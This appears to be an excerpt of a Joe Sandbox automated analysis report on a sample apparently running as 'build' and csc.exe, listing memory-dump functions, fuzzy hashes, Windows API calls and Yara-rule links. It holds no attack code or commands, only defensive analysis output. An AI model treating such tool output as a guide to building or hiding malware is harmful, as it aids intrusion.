Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66b1f2d940cc2a15b99bd33e8a4f4fa5933c9faf2ed567310e30107212ecc8de
Instruction ID: 2d25ff128d068f76006ad27daf84b356ad2c56a7a6956572dcec0643ae5f8720
Opcode Fuzzy Hash: 66b1f2d940cc2a15b99bd33e8a4f4fa5933c9faf2ed567310e30107212ecc8de
Instruction Fuzzy Hash: C26106B2C041159FFB1CCA24DE56AEEB779EB90300F1482FED90DA6284D6B85FC18E45

Function 00427A40 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed25064e58b13f409ae6224364f1636c299320528e1d594b0044869da24cb299
Instruction ID: b7e3b764450d4a7df2afc685ccfb6effe7e2e3bb59e6dbdaf1d74b26299d9b3e
Opcode Fuzzy Hash: ed25064e58b13f409ae6224364f1636c299320528e1d594b0044869da24cb299
Instruction Fuzzy Hash: 2FE0D8B18002145B9200EB24AC094A77FD8EA45224F048679EC4CC3151F732E919C7C7

Function 00421F40 Relevance: 44.1, APIs: 24, Strings: 1, Instructions: 386COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00421F80
GetDlgItem.USER32(?,00000001), ref: 00421FC2
GetWindowRect.USER32(00000000,?), ref: 00421FD9
GetWindowLongW.USER32(?,000000F0), ref: 004220B5
CreateWindowExW.USER32(00000000,ScrollBar,005B5D98,54000014,00000000,00000000,80000000,80000000,?,00000000,00000000,00000000), ref: 004220EB
GetClientRect.USER32(?,?), ref: 00422100
GetWindowRect.USER32(00000000,?), ref: 00422112
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00422141
BeginDeferWindowPos.USER32(00000000), ref: 004221A6
GetDlgItem.USER32(00000000,?), ref: 0042229A
DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000314), ref: 004222BE
GetClientRect.USER32(00000000,?), ref: 004222E2
GetWindowRect.USER32(00000000,?), ref: 004222F4
IsZoomed.USER32(00000000), ref: 00422301
DeferWindowPos.USER32(?,00000000,00000000,?,?,00000000,00000000,-00000355), ref: 0042233C
EndDeferWindowPos.USER32(00000000), ref: 00422343
EndDeferWindowPos.USER32(?), ref: 0042235A
GetWindowLongW.USER32(?,000000F0), ref: 004223AC
GetWindowLongW.USER32(?,000000EC), ref: 004223B7
MapDialogRect.USER32(?,?), ref: 004223EE
AdjustWindowRectEx.USER32(?,?,00000000,?), ref: 00422403
MapDialogRect.USER32(?,00000000), ref: 0042244D
AdjustWindowRectEx.USER32(?,?,00000000,?), ref: 00422462

Strings

ScrollBar, xrefs: 004220E4

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: Window$Rect$Defer$ClientLong$AdjustDialogItem$BeginCreateZoomed
String ID: ScrollBar
API String ID: 376062766-3978720103
Opcode ID: 5876d8cce9d716d45ecffc8679df0715509107c4c30f3f23e34ab5b04b4a616f
Instruction ID: e3a6938857b87d74d63ece223c9eab936984e1976c03630cfa8fdf1f6ee4a28b
Opcode Fuzzy Hash: 5876d8cce9d716d45ecffc8679df0715509107c4c30f3f23e34ab5b04b4a616f
Instruction Fuzzy Hash: C1F14771608701AFD720CF68D944B6ABBF4BF99304F048A1EF585A3660E775E894CF86

Function 00591B20 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 95threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00591B92
GetThreadPriority.KERNEL32(00000000), ref: 00591B99
SetThreadPriority.KERNEL32(00000000,00000000), ref: 00591BC7
ResumeThread.KERNEL32(00000000), ref: 00591BCE
GetCurrentThread.KERNEL32 ref: 00591C10
GetThreadPriority.KERNEL32(00000000), ref: 00591C17

Strings

^QB, xrefs: 00591B20

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: Thread$Priority$Current$Resume
String ID: ^QB
API String ID: 3552734753-2719061505
Opcode ID: 0b9b04df810c6a639e566c421f498884d46788bd4c30f525041f0146986661ae
Instruction ID: 03d6b9e87ad54b36b64c078c781d29aeb48e9228a4f65d4f39ea40a867c40331
Opcode Fuzzy Hash: 0b9b04df810c6a639e566c421f498884d46788bd4c30f525041f0146986661ae
Instruction Fuzzy Hash: EC31EE74A0121AEFCF14DFA4C848BAEBBB9FF44714F004259F812E3281DB74A944DBA4

Function 00591960 Relevance: 9.0, APIs: 6, Instructions: 41threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0059196A
GetThreadPriority.KERNEL32(00000000), ref: 00591971
GetThreadPriority.KERNEL32(00580217), ref: 0059197C
SetThreadPriority.KERNEL32(00580217,00000000), ref: 0059198A
WaitForSingleObject.KERNEL32(00580217,000000FF), ref: 00591995
CloseHandle.KERNEL32(00580217), ref: 005919A3

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: Thread$Priority$CloseCurrentHandleObjectSingleWait
String ID:
API String ID: 1718353164-0
Opcode ID: 73b32dfd8273e6295660c316631d924a610b0adb3fc8822fcb23d5032fc084f5
Instruction ID: 6f4a0c1e44ae4caed6706faa0e674f7cc049ea5f26ed3caede93d4ef78788e63
Opcode Fuzzy Hash: 73b32dfd8273e6295660c316631d924a610b0adb3fc8822fcb23d5032fc084f5
Instruction Fuzzy Hash: 60F03AB5100A13ABCF605BB8EE5D819FB69BF643617108725F036826F2DB31A865EF04

Function 00422A70 Relevance: 6.1, APIs: 4, Instructions: 127windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000001,00000435), ref: 00422B2B
GetDlgItem.USER32(00000001,0000048D), ref: 00422BCF
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00422BDF
DestroyWindow.USER32(00000001), ref: 00422BFE

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: Item$DestroyMessageSendWindow
String ID:
API String ID: 3090131160-0
Opcode ID: ca2848b37b557aabb613ca1c7846c7075ea2733f794bd155616e8047f823f290
Instruction ID: 56018adc457ee554f330d9e31960027dff2f61ac07181aeb852c591fced9a5cf
Opcode Fuzzy Hash: ca2848b37b557aabb613ca1c7846c7075ea2733f794bd155616e8047f823f290
Instruction Fuzzy Hash: 635154B0A00248ABDB20DFA9D949B9EBFF4BF58314F144519E411BB291CBB86904CFA0

Function 00421A40 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000418,00000000,?), ref: 00421A73
SendMessageW.USER32(?), ref: 00421AA9
SendMessageW.USER32(?,00000412,00000000), ref: 00421AD4
SendMessageW.USER32(?,00000411,00000001,?), ref: 00421AE1

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e154f3616b20d02131f8ac69e930b8d754935b032ca4746cd1b7db9f1f45573e
Instruction ID: 056b8dc03bbacfd0d86dd61f933739a328027decfb519111fb1f3285849d17ed
Opcode Fuzzy Hash: e154f3616b20d02131f8ac69e930b8d754935b032ca4746cd1b7db9f1f45573e
Instruction Fuzzy Hash: 98116A71240304ABE7209F2ACD85F1BBBE8FB84B45F40892DF685965A1C7B1F908CB64

Function 00421920 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 00421959
SendMessageW.USER32(?,00000411,00000000,?), ref: 00421971
SendMessageW.USER32(?,00000433,00000000,?), ref: 00421982
GetWindowRect.USER32(?,?), ref: 0042199F

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: MessageSend$RectWindow
String ID:
API String ID: 1944065686-0
Opcode ID: 7b2f938d5d4943be965eb0663962e518f7f26e6a711bc9cb0b5819c0799ef7b5
Instruction ID: 594fdfbadbf35a74eff55c0d0a36d92e90d8671c7fb2c7794805fcb4d06949e0
Opcode Fuzzy Hash: 7b2f938d5d4943be965eb0663962e518f7f26e6a711bc9cb0b5819c0799ef7b5
Instruction Fuzzy Hash: 8F112771B016247BDB219F29EC06F9BBB68EF21760F444316FD04662A1D770BA94CBD8

Function 00401922 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000040D,00000000,00000000), ref: 00421959
SendMessageW.USER32(?,00000411,00000000,?), ref: 00421971
SendMessageW.USER32(?,00000433,00000000,?), ref: 00421982
GetWindowRect.USER32(?,?), ref: 0042199F

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: MessageSend$RectWindow
String ID:
API String ID: 1944065686-0
Opcode ID: 59de93ffc885d8b3cfd5118fbbd8d5450dd13599d371894dab07d54a46468e35
Instruction ID: 976cf0dfd2e6fdd224c174f1518e0448649e182263952f6c5103e505f245c106
Opcode Fuzzy Hash: 59de93ffc885d8b3cfd5118fbbd8d5450dd13599d371894dab07d54a46468e35
Instruction Fuzzy Hash: D2112770B01224BBDB218F29EC01B9AB764FF21710F444206FD0466161D770E994CBC8

Function 004E5510 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004E553C

Strings

Dc[, xrefs: 004E5520
%path_sort%, xrefs: 004E55FF

Memory Dump Source

Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_build.jbxd

Yara matches

Similarity

API ID: CurrentThread
String ID: %path_sort%$Dc[
API String ID: 2882836952-418770324
Opcode ID: 4da7f740f64944a77406cc8cf8fc37ffc635ebb709fc4d4f05e17eb5a452c0a7
Instruction ID: 80f9f5d8d4006964c7a56ff0b8deedac7b6fac6e158ca5e25abf240470f13d79
Opcode Fuzzy Hash: 4da7f740f64944a77406cc8cf8fc37ffc635ebb709fc4d4f05e17eb5a452c0a7
Instruction Fuzzy Hash: 0A41F334A016859FCB10DFA6D814BAEBBF2FF5530AF58419AD801A73A1DB35AC04CF54

Analysis Process: csc.exePID: 8136, Parent PID: 7720COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	96.3%
Signature Coverage:	0%
Total number of Nodes:	81
Total number of Limit Nodes:	6

Executed Functions

Function 0AE46359 Relevance: 1.8, APIs: 1, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2974247838.000000000AE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ae40000_csc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f87e6c26468ab0a4f2b7ea51163c31a419d888c65fffe78e84061ffa09e5435
Instruction ID: 7010a12d1c36dbfb2a5b5918f82ca45afca01e68b67514c57edb0ed457f76471
Opcode Fuzzy Hash: 3f87e6c26468ab0a4f2b7ea51163c31a419d888c65fffe78e84061ffa09e5435
Instruction Fuzzy Hash: 79D17D30A00208CFDB14DFA9D948BADBBF6BF85308F159559E409AF2A5DB74E845CF80

Function 0A660048 Relevance: 26.7, Strings: 21, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0A6604F5
?, xrefs: 0A6600AF
$^q, xrefs: 0A660413
$^q, xrefs: 0A660527
$^q, xrefs: 0A660357
$^q, xrefs: 0A66019F
$^q, xrefs: 0A66011C
$^q, xrefs: 0A660275
$^q, xrefs: 0A660363
$^q, xrefs: 0A66024F
$^q, xrefs: 0A660193
$^q, xrefs: 0A660281
$^q, xrefs: 0A6601FE
$^q, xrefs: 0A6602E0
$^q, xrefs: 0A66051B
$^q, xrefs: 0A6603C2
$^q, xrefs: 0A660439
$^q, xrefs: 0A660331
$^q, xrefs: 0A660445
$^q, xrefs: 0A66016D
$^q, xrefs: 0A6604A4

Memory Dump Source

Source File: 00000009.00000002.2974018869.000000000A660000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a660000_csc.jbxd

Similarity

API ID:
String ID: ?$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2982888449
Opcode ID: c3e9729193b8724ad823118b6bf749efb34026161863426e8ed0c104bbafc0c7
Instruction ID: d01b9594f48a19bc26eb671d6cb26975a16be439f573c1c0b228a6128a0e6e7f
Opcode Fuzzy Hash: c3e9729193b8724ad823118b6bf749efb34026161863426e8ed0c104bbafc0c7
Instruction Fuzzy Hash: CBF1AD30B402099FDB28DFA5C944A6EBBB6FF88700F15C529E4069B3A5DB35EC46CB51

Function 0A660000 Relevance: 7.8, Strings: 6, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?, xrefs: 0A6600AF
$^q, xrefs: 0A6601FE
$^q, xrefs: 0A6602E0
$^q, xrefs: 0A6603C2
$^q, xrefs: 0A66011C
$^q, xrefs: 0A6604A4

Memory Dump Source

Source File: 00000009.00000002.2974018869.000000000A660000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a660000_csc.jbxd

Similarity

API ID:
String ID: ?$$^q$$^q$$^q$$^q$$^q
API String ID: 0-4250046088
Opcode ID: ac4600dcaff718b9910964fb5d6f3324320b4ac45ff30c045ee50a9fc58f3cb3
Instruction ID: 362ea9ee2dd576df48acd05c7cbfe9523dcab0a64ac289120eb0605947034766
Opcode Fuzzy Hash: ac4600dcaff718b9910964fb5d6f3324320b4ac45ff30c045ee50a9fc58f3cb3
Instruction Fuzzy Hash: 4E915030B443058FCB158BA8C850B6EBBB2FF85700F1585AAD002DF3A6DB75DC068B62

Function 0663F928 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,0663FC45), ref: 0663FCC8

Strings

4'\, xrefs: 0663F928

Memory Dump Source

Source File: 00000009.00000002.2970704506.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6630000_csc.jbxd

Similarity

API ID: DeleteFile
String ID: 4'\
API String ID: 4033686569-2513705929
Opcode ID: f19ad4bc577272a28bb9845a07731382d7e97d8036bf6bcfd29470be39a2893d
Instruction ID: 0336bcd53038170386e263cdcf593d13ff54fad00fb7db9e1515ecbcbbd64667
Opcode Fuzzy Hash: f19ad4bc577272a28bb9845a07731382d7e97d8036bf6bcfd29470be39a2893d
Instruction Fuzzy Hash: C62124B1D006699FCB14DF9AC544BAEFBF4FB48320F10812AE818A7350D378A945CFA5

Function 06633334 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 066333F1

Memory Dump Source

Source File: 00000009.00000002.2970704506.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6630000_csc.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d6750c201b113678ad00e43c4b23e58a2bf0125a7d38f097f504eacab85760ec
Instruction ID: 4f4aade6d934e5bca9e7f5f3dfb45392effbd7c1847b93e6d70e73a9b122d8a3
Opcode Fuzzy Hash: d6750c201b113678ad00e43c4b23e58a2bf0125a7d38f097f504eacab85760ec
Instruction Fuzzy Hash: 5341F2B0C00269CFDB64CFA9C844B9EFBB5BF45314F20806AD408BB251DB756986CF90

Function 0AE413C4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0AE430D1

Memory Dump Source

Source File: 00000009.00000002.2974247838.000000000AE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_ae40000_csc.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 3436ab9539e04c51eac49690e034c7acce09658e87ce9c8549ec3ff14ebe460b
Instruction ID: 45c320113d3262123982c058607e93912a3a8d711fda3d7acfcd4a06eb3250e4
Opcode Fuzzy Hash: 3436ab9539e04c51eac49690e034c7acce09658e87ce9c8549ec3ff14ebe460b
Instruction Fuzzy Hash: C9413AB5A00209DFCB14CF59C448AAAFBF9FF88314F24C559D519AB321D375A841CFA0

Function 06631978 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 066333F1

Memory Dump Source

Source File: 00000009.00000002.2970704506.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6630000_csc.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 07e1429e0626a61d80b5ab21006c75003be7aeebc97d2a09dfaf29b77dd03379
Instruction ID: f4e3af86b54e0c0b23c565ce871509a9e0570f85dca7cca0042265c8d0ef3db3
Opcode Fuzzy Hash: 07e1429e0626a61d80b5ab21006c75003be7aeebc97d2a09dfaf29b77dd03379
Instruction Fuzzy Hash: 0A41E0B0C00659CFDB64CFA9C844B9EBBB5BF48304F2080AAD409BB251DB756986CF90

Function 0663FC22 Relevance: 1.6, APIs: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,0663FC45), ref: 0663FCC8

